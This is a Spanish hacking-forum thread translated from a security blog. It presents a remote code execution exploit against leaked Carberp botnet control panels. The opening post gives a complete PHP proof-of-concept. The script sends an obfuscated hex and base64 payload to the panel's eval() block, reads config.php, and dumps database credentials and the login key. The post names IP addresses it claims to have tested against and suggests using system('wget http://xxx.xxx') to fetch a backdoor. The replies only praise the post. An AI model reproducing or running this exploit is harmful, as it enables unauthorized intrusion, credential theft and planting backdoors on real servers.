comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Carberp Remote Code Execution

  • 2 Respuestas
  • 2300 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado d1d4c

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Junio 29, 2013, 10:44:44 pm »
Todos estan mirando el codigo fuente de Carpberp, bootkit y otros componentes pero ¿Se han puesto a investigar el codigo fuente del panel?

Aqui hablare sobre una simple injeccion de codigo pero hay muchas mas vulnerabilidades en estos paneles filtrados.

Ejemplo: Codigo estupido que permite IP spoofing:




No, pero en serio la mejor vulnerabilidad es la de ejecucion remota de codigo(RCE), el tipo que escribio esto es realmente retrasado mental



Miren el bloque del eval()!

Oh que oportuno, algunos paneles de Carpberp  aparecieron en vx.vault


Ahora, escribamos un spl0it, pienso que la mayoria de ustedes vinieron por la prueba de concepto(PoC), verdad?

Código: PHP
  1. Carberp RCE
  2. <table width="607" border="0">
  3. <tr>
  4. <td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
  5. <label for="carberp">Domain: </label>
  6. <input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
  7. <input type="submit" name="button" id="button" value="Ownz !" />
  8. </form></td>
  9. </tr>
  10. <tr>
  11. <td><?php
  12. /*
  13. Xyl2k!
  14. Greeting to Xartrick for fixing the payload (:
  15. */
  16. if(!isset($_POST['urlz'])) ;
  17. else
  18. if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
  19. {
  20. echo "<font color='red'>URL is not valid</font>";
  21. }
  22. else
  23. {
  24. {
  25. $data = array(
  26. 'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
  27. 'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
  28. $ch = curl_init();
  29. curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
  30. curl_setopt($ch, CURLOPT_HEADER, 0);
  31. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
  32. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  33. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  34. curl_setopt($ch, CURLOPT_POST, 1);
  35. curl_setopt($ch,CURLOPT_TIMEOUT,30);
  36. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  37. $contents = curl_exec($ch);
  38. if (preg_match("#-#", $contents))
  39. { echo "<pre>" . $contents . "</pre>"; }
  40. else
  41. { echo "<font color='red'>Not vulnerable :(</font>"; }
  42. }
  43. }
  44. ?></td>
  45. </tr>
  46. </table>
  47.  

La parte codificada hace un file_get_contents() al includes/config.php
Luego se conecta ala base de datos y muestra las credenciales de Carberp.(en caso de que no tengamos phpMyAdmin)
Pero esto seria inútil si nosotros no podemos mostrar la pagina de ingreso debido ala llave de Autenticacion, asi que el poc analiza el index.php y lo obtiene.
Genial payload huh?
Probemoslo ...

37.221.165.123:




91.214.202.117:



Lo he probado en algunos mas C&C(comanda y controla) y todo salio bien.
Y esto en un RCE asi que puedes ejecutar cosas interesantes como system('wget http://xxx.xxx');
para descargar una puerta trasera o cualquier cosa

Fuente:http://www.xylibox.com/
Traducido por mi
« Última modificación: Noviembre 23, 2014, 02:16:48 pm por Expermicid »

Desconectado pekeinfo

  • *
  • Underc0der
  • Mensajes: 30
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Julio 01, 2013, 02:21:02 am »
Excelente aporte seguro que hay mas de una vulnerabilidad.

Desconectado The Swash

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • Return to reversing!
    • Ver Perfil
    • Email
  • Skype: the_swash@outlook.com
« Respuesta #2 en: Julio 04, 2013, 09:14:41 am »
Si se dejaron escapar detalles como estos en el panel, no quisiera pensar los de código  :-X

Saludos y gracias!

 

¿Te gustó el post? COMPARTILO!



Codeando un exploit I: Source Code Disclosure

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1859
Último mensaje Febrero 24, 2010, 03:28:43 pm
por dracko.rx
Cpanel + FTP Cracker | Code Security

Iniciado por ANTRAX

Respuestas: 5
Vistas: 5588
Último mensaje Octubre 17, 2012, 11:43:48 am
por t0st4d0r
[Tutorial] Source Code Disclosure

Iniciado por arthusu

Respuestas: 0
Vistas: 1519
Último mensaje Julio 22, 2013, 10:58:42 pm
por arthusu
Shellter - Shell Code Injector

Iniciado por ZanGetsu

Respuestas: 0
Vistas: 2512
Último mensaje Agosto 12, 2014, 10:51:39 am
por ZanGetsu
Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC

Iniciado por hielasangre

Respuestas: 0
Vistas: 1855
Último mensaje Agosto 27, 2011, 05:33:54 pm
por hielasangre